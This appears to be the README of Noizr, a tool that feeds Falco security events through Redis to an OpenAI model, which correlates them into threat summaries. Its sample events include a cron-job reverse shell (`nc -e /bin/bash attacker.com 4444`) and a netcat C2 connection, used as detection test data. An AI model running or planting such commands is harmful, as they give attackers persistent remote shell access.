Noizr is a modular, scalable system for processing security events from Falco and other security tools. It uses AI to analyze and correlate events, identifying real threats and providing detailed summaries and recommendations.
Noizr uses a microservices architecture with three main components that work together to process security events:
┌────────────────┐ ┌─────────────┐ ┌────────────────┐ ┌───────────────┐
│ │ │ │ │ │ │ │
│ Security │────▶│ Event │────▶│ Redis Stream │────▶│ Event │
│ Tools (Falco) │ │ Receiver │ │ (Raw Events) │ │ Processor │
│ │ │ │ │ │ │ (AI-based) │
└────────────────┘ └─────────────┘ └────────────────┘ └───────┬───────┘
│
│ Enriched
│ Events
▼
┌────────────────┐ ┌────────────────┐ ┌───────────────┐
│ │ │ │ │ Redis List │
│ External │◀────│ Event │◀────│ (Processed │
│ Systems │ │ Forwarder │ │ Events) │
│ │ │ │ │ │
└────────────────┘ └────────────────┘ └───────────────┘
- Security tools (e.g., Falco) send events to the Event Receiver via webhooks
- Raw events are stored in Redis Streams for efficient time-series processing
- The Event Processor periodically analyzes recent events using AI to:
- Correlate related events
- Determine if events represent a real threat
- Generate a detailed summary and recommendation
- High-confidence threats are stored as enriched events in a Redis list (
noizr:enriched_events) - The Alert Forwarder consumes events from the Redis list and forwards them to external systems (e.g., SIEMs, alerting platforms)
The Event Receiver provides a webhook API for receiving security events from various sources.
- HTTP service that listens on a configurable port
- Currently supports Falco events at
/api/events/falco - Validates and standardizes incoming events
- Stores events in Redis Streams for processing
- Includes health check endpoint at
/health
Example Falco event JSON structure:
{
"output": "Suspicious process spawned in container (user=root command=sh container=webapp)",
"priority": "Warning",
"rule": "Launch Privileged Shell",
"source": "container",
"time": "2023-11-10T14:53:12.345Z",
"output_fields": {
"user.name": "root",
"proc.cmdline": "sh -c echo 'hello'",
"container.id": "61616161",
"container.name": "webapp"
}
}Redis Streams are used as the central event store, providing:
- Time-ordered event storage
- Efficient retrieval of events within a time window
- Pub/Sub capabilities for notifying the forwarder
- Persistence for processed events
Key Redis structures used:
noizr:events:raw- Stream of raw security eventsnoizr:events:processed- Hash containing processed/enriched eventsnoizr:events:processed:new- Pub/Sub channel for new processed events
The AI-powered Event Processor analyzes security events to identify threats:
- Runs on a configurable interval (default: 60 seconds)
- Retrieves events within a correlation timeframe (default: 10 minutes)
- Uses OpenAI's GPT models to analyze events (extensible to other AI providers)
- Applies confidence scoring to reduce false positives
- Enriches events with summaries, severity ratings, and remediation recommendations
The AI analysis uses a specialized prompt that instructs the model to:
- Analyze security events for patterns indicating real threats
- Determine a severity level (Low, Medium, High, Critical)
- Provide a concise summary of the threat
- Recommend mitigation actions
- Assign a confidence score to the analysis
Example of an enriched event:
{
"id": "b78a4d2e1c06f952",
"original_events": [
{
"output": "Suspicious process spawned in container (user=root command=sh container=webapp)",
"priority": "Warning",
"rule": "Launch Privileged Shell",
"source": "container",
"time": "2023-11-10T14:53:12.345Z",
"output_fields": {
"user.name": "root",
"proc.cmdline": "sh -c echo 'hello'",
"container.id": "61616161",
"container.name": "webapp"
}
},
{
"output": "File created below /etc by untrusted program (user=root command=sh file=/etc/cron.d/backdoor)",
"priority": "Critical",
"rule": "File Created Below /etc",
"source": "container",
"time": "2023-11-10T14:53:14.456Z",
"output_fields": {
"user.name": "root",
"proc.cmdline": "sh -c echo '* * * * * root /bin/nc -e /bin/bash attacker.com 4444' > /etc/cron.d/backdoor",
"container.id": "61616161",
"container.name": "webapp",
"fd.name": "/etc/cron.d/backdoor"
}
}
],
"summary": "Possible container compromise and persistence mechanism via cron job backdoor",
"severity": "Critical",
"recommendation": "Immediately isolate the container, investigate the source of the compromise, verify image integrity, and review container privileges",
"created_at": "2023-11-10T14:54:00.123Z",
"confidence_score": 0.95
}The Alert Forwarder delivers processed alerts to external systems:
- Listens for newly processed events via Redis Pub/Sub
- Forwards enriched events to a configurable webhook endpoint
- Provides authentication via bearer tokens
- Implements retry logic with exponential backoff
- Can be disabled if not needed
- Kubernetes cluster
- Helm 3+
- Docker (for building and local development)
- OpenAI API key (or other AI provider credentials)
- Redis (standalone or cluster)
-
Clone the repository:
git clone https://github.com/your-org/noizr.git cd noizr -
Create a values file with your configuration:
cat > values-custom.yaml << EOF config: openai: api_key: "your-openai-api-key" model: "gpt-4" # or gpt-3.5-turbo for lower cost temperature: 0.1 max_tokens: 1024 forwarder: enabled: true url: "https://your-webhook-endpoint.com" auth_token: "your-webhook-auth-token" retry_count: 3 processor_settings: correlation_timeframe_minutes: 5 min_confidence_score: 0.7 idle_processing_threshold_seconds: 60 receiver: replicaCount: 2 service: type: ClusterIP # Change to LoadBalancer if needed for external access redis: enabled: true # Set to false if using an external Redis instance auth: password: "your-secure-redis-password" # Leave empty for auto-generated master: persistence: size: 8Gi EOF
-
Install with Helm:
helm install noizr ./deployments/helm -f values-custom.yaml
-
Verify the installation:
kubectl get pods -l app=noizr-receiver kubectl get pods -l app=noizr-processor kubectl get pods -l app=noizr-forwarder
-
Access the receiver service:
# If using ClusterIP kubectl port-forward svc/noizr-receiver 8080:8080 # If using LoadBalancer export SERVICE_IP=$(kubectl get svc noizr-receiver -o jsonpath='{.status.loadBalancer.ingress[0].ip}') echo "Service available at: http://$SERVICE_IP:8080"
If you're using an existing Redis instance:
-
Update your values file:
redis: enabled: false # Disable built-in Redis config: redis: address: "your-redis-host:6379" password: "your-redis-password" db: 0
-
Ensure your Redis instance is configured with:
- Persistence enabled (AOF or RDB)
- Enough memory for your expected event volume
- Network access from your Kubernetes cluster
To build and push the Docker images:
# Build the image
docker build -t your-registry.com/your-org/noizr:latest -f deployments/docker/Dockerfile .
# Push to your registry
docker push your-registry.com/your-org/noizr:latest
# Update Helm values to use your image
cat > values-image.yaml << EOF
receiver:
image:
repository: your-registry.com/your-org/noizr
tag: latest
processor:
image:
repository: your-registry.com/your-org/noizr
tag: latest
forwarder:
image:
repository: your-registry.com/your-org/noizr
tag: latest
EOF
# Apply the updated image values
helm upgrade noizr ./deployments/helm -f values-custom.yaml -f values-image.yamlNoizr is configured via a YAML configuration file and environment variables, with the following key options:
| Parameter | Description | Default |
|---|---|---|
server.port |
HTTP server port | 8080 |
| Parameter | Description | Default |
|---|---|---|
redis.address |
Redis server address | "noizr-redis-master:6379" |
redis.password |
Redis password | "" |
redis.db |
Redis database index | 0 |
| Parameter | Description | Default |
|---|---|---|
openai.api_key |
OpenAI API key | "" |
openai.model |
OpenAI model to use | "gpt-4" |
openai.temperature |
Model temperature (randomness) | 0.1 |
openai.max_tokens |
Maximum tokens in response | 1024 |
openai.system_prompt |
Custom system prompt | Built-in default |
| Parameter | Description | Default |
|---|---|---|
forwarder.enabled |
Enable the forwarder | false |
forwarder.url |
Webhook URL | "https://example.com/webhook" |
forwarder.auth_token |
Authentication token | "" |
forwarder.retry_count |
Number of retries | 3 |
| Parameter | Description | Default |
|---|---|---|
processor_settings.correlation_timeframe_minutes |
Event correlation window | 5 |
processor_settings.min_confidence_score |
Minimum confidence threshold | 0.7 |
processor_settings.idle_processing_threshold_seconds |
Flush batch if no events arrive for this many seconds | 60 |
/
├── cmd/
│ ├── receiver/ # Webhook receiver service
│ ├── processor/ # AI processor service
│ ├── forwarder/ # Alert forwarder service
├── pkg/
│ ├── models/ # Shared data models
│ ├── store/ # Store implementation (Redis)
│ ├── ai/ # AI client implementations
│ ├── config/ # Configuration
│ ├── logger/ # Logging utilities
├── deployments/
│ ├── helm/ # Helm charts
│ ├── docker/ # Dockerfiles
├── README.md
└── go.mod
For local development:
-
Start Redis locally:
docker run -d -p 6379:6379 --name noizr-redis redis:alpine
-
Create a local config file:
cat > config.yaml << EOF server: port: 8080 redis: address: "localhost:6379" password: "" db: 0 openai: api_key: "your-openai-api-key" model: "gpt-4" processor_settings: correlation_timeframe_minutes: 5 min_confidence_score: 0.7 idle_processing_threshold_seconds: 60 forwarder: enabled: false EOF
-
Run the services (each in a separate terminal):
# Run the receiver go run cmd/receiver/main.go --config . --log-level debug # Run the processor go run cmd/processor/main.go --config . --log-level debug # Run the forwarder if needed go run cmd/forwarder/main.go --config . --log-level debug
Run the tests with:
go test ./...
# Run with coverage
go test -cover ./...
# Generate coverage report
go test -coverprofile=coverage.out ./...
go tool cover -html=coverage.outTo test the system, you can send a sample Falco event:
curl -X POST http://localhost:8080/api/events/falco \
-H "Content-Type: application/json" \
-d '{
"output": "Suspicious outbound connection to C2 server (user=root command=nc ip=203.0.113.100)",
"priority": "Critical",
"rule": "Outbound Connection to C2 Server",
"source": "syscall",
"output_fields": {
"user.name": "root",
"proc.cmdline": "nc 203.0.113.100 4444",
"fd.sip": "10.0.0.2",
"fd.dip": "203.0.113.100",
"fd.dport": 4444
}
}'To test the entire pipeline, including the AI processing and forwarding:
- Set up a test webhook receiver (e.g., using Webhook.site or RequestBin)
- Configure the forwarder to send to your test endpoint:
forwarder: enabled: true url: "https://webhook.site/your-unique-id" auth_token: ""
- Send several related security events
- Check the processor logs to see the AI analysis
- Verify the enriched event is received at your test webhook endpoint
Noizr exposes Prometheus metrics on the /metrics endpoint, including:
- Event processing rates and latencies
- AI analysis times
- Error counts
- Queue sizes
Noizr uses structured JSON logging with configurable levels:
debug- Detailed debugging informationinfo- General operational informationwarn- Warning conditionserror- Error conditions
Logs can be collected using standard Kubernetes logging tools like Fluentd, Logstash, or the ELK stack.
Recommended resource allocations:
| Component | CPU | Memory |
|---|---|---|
| Receiver | 0.5-1 cores | 512MB-1GB |
| Processor | 1-2 cores | 1-2GB |
| Forwarder | 0.5 cores | 512MB |
| Redis | 1-2 cores | 2-4GB |
For high-volume environments, scale the receiver horizontally and increase Redis resources.
To back up the system:
- Set up Redis persistence (AOF and RDB)
- Regularly back up Redis data
- Store configuration securely
To restore:
- Deploy Noizr components
- Restore Redis data
- Apply saved configuration
Problem: Events are not being received
- Verify network connectivity to the receiver
- Check for HTTP status codes in the logs
- Ensure the receiver service is running (
kubectl get pods)
Problem: Events are received but not stored
- Check Redis connectivity in receiver logs
- Verify Redis authentication settings
Problem: Events are not being processed
- Check if the processor is running (
kubectl get pods) - Look for errors in the processor logs
- Verify OpenAI API key is valid
- Check if the correlation timeframe is too short
Problem: AI analysis is too slow
- Consider using a faster model (e.g., gpt-3.5-turbo instead of gpt-4)
- Increase processor resources
- Adjust the analysis interval
Problem: Processed events are not being forwarded
- Verify the forwarder is enabled in the configuration
- Check the target webhook URL is accessible
- Look for retry errors in the forwarder logs
You can check the Redis store directly to debug issues:
# Get a shell in the Redis pod
kubectl exec -it noizr-redis-master-0 -- redis-cli
# List raw events in the stream
XRANGE noizr:events:raw - +
# Check processed events
HGETALL noizr:events:processedTo add support for new event sources:
-
Create a new endpoint in the Event Receiver
cmd/receiver/main.go:router.HandleFunc("/api/events/new-source", func(w http.ResponseWriter, r *http.Request) { var event models.NewSourceEvent decoder := json.NewDecoder(r.Body) if err := decoder.Decode(&event); err != nil { // Handle error } // Process and store the event }).Methods("POST")
-
Define appropriate data models in
pkg/models/event.go:// NewSourceEvent represents events from the new source type NewSourceEvent struct { // Define fields }
-
Add parsing logic for the new event format
To add support for alternative AI providers:
-
Create a new package in
pkg/ai/(e.g.,pkg/ai/azureopenai/) -
Implement the
ai.Providerinterface:package azureopenai // Implementation of the Provider interface type Provider struct { // Provider-specific fields } func New(config ...) ai.Provider { // Initialize provider } // Implement required interface methods func (p *Provider) AnalyzeEvents(ctx context.Context, events []models.FalcoEvent) (*models.EnrichedEvent, error) { // Provider-specific implementation } func (p *Provider) Close() error { // Cleanup logic }
-
Add configuration options in
pkg/config/config.go -
Update the processor to use the new provider
For high-volume environments:
-
Scale the receiver horizontally:
kubectl scale deployment noizr-receiver --replicas=5
-
Optimize Redis:
- Use Redis Cluster for horizontal scaling
- Configure appropriate maxmemory settings
- Set up proper eviction policies
-
Process events in batches:
- Adjust the processor's analysis interval
- Implement batch processing to reduce API calls
To optimize AI usage and costs:
- Use pre-filtering to reduce events sent to AI
- Implement caching for similar event patterns
- Consider using less expensive models for initial screening
- Use token optimization techniques in your prompts
Planned enhancements for Noizr:
-
Additional Event Sources
- Support for CloudTrail logs
- Support for Wazuh events
- Generic webhook adapter for custom sources
-
Enhanced AI Capabilities
- Local model support (e.g., llama.cpp)
- Hybrid approach using rules + AI
- Fine-tuning for specific security domains
-
Visualization and UI
- Web dashboard for event monitoring
- Threat visualization and timeline
- Interactive remediation recommendations
-
Advanced Correlation
- Cross-source event correlation
- Persistent threat tracking
- Attack chain reconstruction
This project is licensed under the Apache License, Version 2.0 - see the LICENSE file for details.
Contributions are welcome! Please feel free to submit a Pull Request.
For support, please open an issue on the GitHub repository or contact the maintainers.
Noizr includes a test script that simulates a complete attack sequence to demonstrate the system's correlation and analysis capabilities.
The test-attack-sequence.sh script sends a sequence of six Falco events that represent different stages of a container escape and data exfiltration attack:
- Initial Access: Shell spawned in a container
- Reconnaissance: Sensitive file access
- Privilege Escalation: Adding CAP_SYS_ADMIN capability
- Container Escape: Mount operation from inside container
- Data Exfiltration: Outbound connection to C2 server
- Persistence: Cron job creation
Before running the test script, ensure:
-
Redis is running:
make dev-env
-
The receiver component is running:
./bin/receiver --config ./my-config.yaml --log-level debug
-
The processor component is running:
./bin/processor --config ./my-config.yaml --log-level debug
Execute the script:
./test-attack-sequence.shThe script will send each event with a 7-second delay between them, showing the progress and status of each request.
Watch the processor's output to see:
- Each event being processed individually
- Events being correlated as part of the same attack sequence
- AI analysis detecting the attack pattern
- A comprehensive security event with:
- Detailed attack summary
- Severity assessment
- Recommended actions
- Confidence score
You can modify the script to adjust:
- The delay between events (DELAY_BETWEEN_EVENTS variable)
- The API endpoint (API_ENDPOINT variable)
- The details of individual events to test different scenarios
This test script is valuable for demonstrating Noizr's capabilities, testing your configuration, and understanding how the system processes attack sequences.
# compile all three binaries
make build
# start the receiver & processor (debug for extra logs)
./bin/receiver --config my-config.yaml --log-level debug &
./bin/processor --config my-config.yaml --log-level debug &
# start the forwarder **only if `forwarder.enabled: true`**
./bin/forwarder --config my-config.yaml --log-level info &Falco → receiver (stores raw events in Redis stream)
↓
processor (correlates, calls OpenAI, writes enriched events to
Redis list `noizr:enriched_events`)
↓
forwarder (BRPOP on the list, HTTP-POSTs to your webhook)
The processor will flush a workload batch when:
- the correlation-window (
correlation_timeframe_minutes) is reached or - no new events for
idle_processing_threshold_seconds.
Idle checks run every 10 s and include both "idle time" and "total time"
in the debug log line:
IDLE CHECK: Workload … idle for 45s (threshold: 60s) | total 2m15s | events: 12
# Add the Bitnami repo for Redis dependency
helm repo add bitnami https://charts.bitnami.com/bitnami
# Install Noizr with custom values
helm dependency update ./deployments/helm
helm upgrade --install noizr -n noizr --create-namespace ./deployments/helm -f values-custom.yamlInstall Falco in the same namespace, configured to send events to the Noizr receiver:
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm upgrade --install falco falcosecurity/falco \
--namespace noizr --create-namespace \
--set falco.http_output.enabled=true \
--set falco.http_output.url="http://noizr-receiver.noizr.svc.cluster.local:8080/api/events/falco" \
--set falco.json_output=true \
--set json_include_output_property=trueThis one-liner installs Falco with:
- JSON-formatted output
- HTTP output enabled and pointing to the Noizr receiver service
- 5-second timeout for HTTP requests
To test the system with realistic security events, deploy the Falco event generator:
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
# wait for the noizr deployment to be ready
kubectl wait --for=condition=ready pod -l app=noizr -n noizr
helm upgrade --install eg falcosecurity/event-generator \
--namespace noizr --create-namespace \
--set config.command=run \
--set config.loop=false \
--set-string config.sleep="0s" \
--set-string config.actions='syscall.(RunShellUntrusted|ChangeThreadNamespace|ReadSensitiveFileUntrusted|WriteBelowBinaryDir|NetcatRemoteCodeExecutionInContainer|InterpretedProcsOutboundNetworkActivity|SetSetuidOrSetgidBit|ScheduleCronJobs|RemoveBulkDataFromDisk|ModifyShellConfigurationFile)$'This command deploys the event generator to:
- Generate a variety of security events that will trigger Falco rules
- Run each action once (non-looping)
- Execute actions without delay between them
- Focus on common attack patterns like untrusted shells, namespace changes, sensitive file access, and more
You should see events flowing from Falco to Noizr within seconds of deployment.
server:
port: 8080
redis:
address: "localhost:6379"
password: ""
db: 0
openai:
api_key: "<your-key>"
model: "gpt-4"
temperature: 0.1
max_tokens: 1024
# system_prompt: "optional custom prompt"
# Forward every enriched event as JSON to an external HTTP endpoint.
# The forwarder binary must be running and `enabled` set to true.
forwarder:
enabled: true
url: "https://webhook.site/<id>"
auth_token: "" # optional Bearer token
retry_count: 3 # exponential back-off retries on failure
processor_settings:
correlation_timeframe_minutes: 5 # batch window
min_confidence_score: 0.7
idle_processing_threshold_seconds: 60 # flush early if idle| Key | Default | Description |
|---|---|---|
forwarder.enabled |
false |
Start the forwarder and send webhook requests |
forwarder.auth_token |
"" |
Added Authorization: Bearer header |
forwarder.retry_count |
3 |
Times a failed POST is retried with back-off |
processor_settings.idle_processing_threshold_seconds |
60 |
Flush batch if no events arrive for this many seconds |
Use --log-level debug to enable verbose, pretty-printed JSON output of each
incoming Falco event. Helper functions logger.IsDebug()/IsInfo() replace
direct checks on logrus levels, avoiding extra imports.
The repo ships with test-attack-sequence.sh which replays a sample Falco
JSON stream. Launch all three services (receiver, processor, forwarder) then
run:
./test-attack-sequence.shYou should see:
- Receiver logs each Falco event.
- Processor logs
🔔 IDLE THRESHOLD REACHED(or🔄 WINDOW COMPLETE) followed byStored processed event …. - Forwarder logs
forwarded event … (severity …)and the webhook receives the JSON.
# Start Redis in Docker
make dev-env
# Run components in development mode
make run-receiver
make run-processor
make run-forwarder
# Stop development environment
make dev-env-stop# Build multi-architecture Docker image (linux/amd64, linux/arm64)
make docker-build-
Redis Connection Errors: Ensure Redis is running and accessible. Check the Redis password if authentication is enabled.
-
OpenAI API Errors: Verify your API key is valid and has sufficient quota.
-
Forwarder Not Sending Events: Check that
forwarder.enabledis set totruein your config file. -
Falco Not Sending Events: Verify the Falco HTTP output is correctly configured to point to your Noizr receiver endpoint.
# View logs for each component
kubectl logs -l app=noizr-receiver
kubectl logs -l app=noizr-processor
kubectl logs -l app=noizr-forwarder
kubectl logs -l app=falco